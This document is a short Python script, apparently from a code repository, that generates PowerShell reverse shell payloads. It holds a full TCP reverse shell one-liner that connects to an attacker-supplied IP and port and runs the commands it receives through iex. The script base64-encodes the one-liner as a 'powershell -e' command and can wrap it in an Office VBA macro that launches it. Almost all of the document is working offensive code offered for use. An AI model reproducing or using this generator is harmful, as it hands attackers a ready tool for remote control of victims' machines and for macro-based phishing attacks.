Generate PowerShell reverse shell payloads

generator.py

#!/usr/bin/env python3
# Author: Jakob Friedl
# Description: Generate powershell reverse shell payloads

import sys
import base64
import argparse

parser = argparse.ArgumentParser(description="Powershell reverse shell generator")
parser.add_argument('ip')
parser.add_argument('port')
parser.add_argument('-m', '--macro', action='store_true', help='Generate payload in VBA format for Microsoft Office macro')

args = parser.parse_args()

payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (args.ip, int(args.port))

cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

if args.macro:
    # Line length
    n = 50

    print("Dim Str as String")
    for i in range(0, len(cmdline), n):
            print("Str = Str + " + '"' + cmdline[i:i+n] + '"')
    print('CreateObject("Wscript.Shell").Run Str')
else:
    print(cmdline)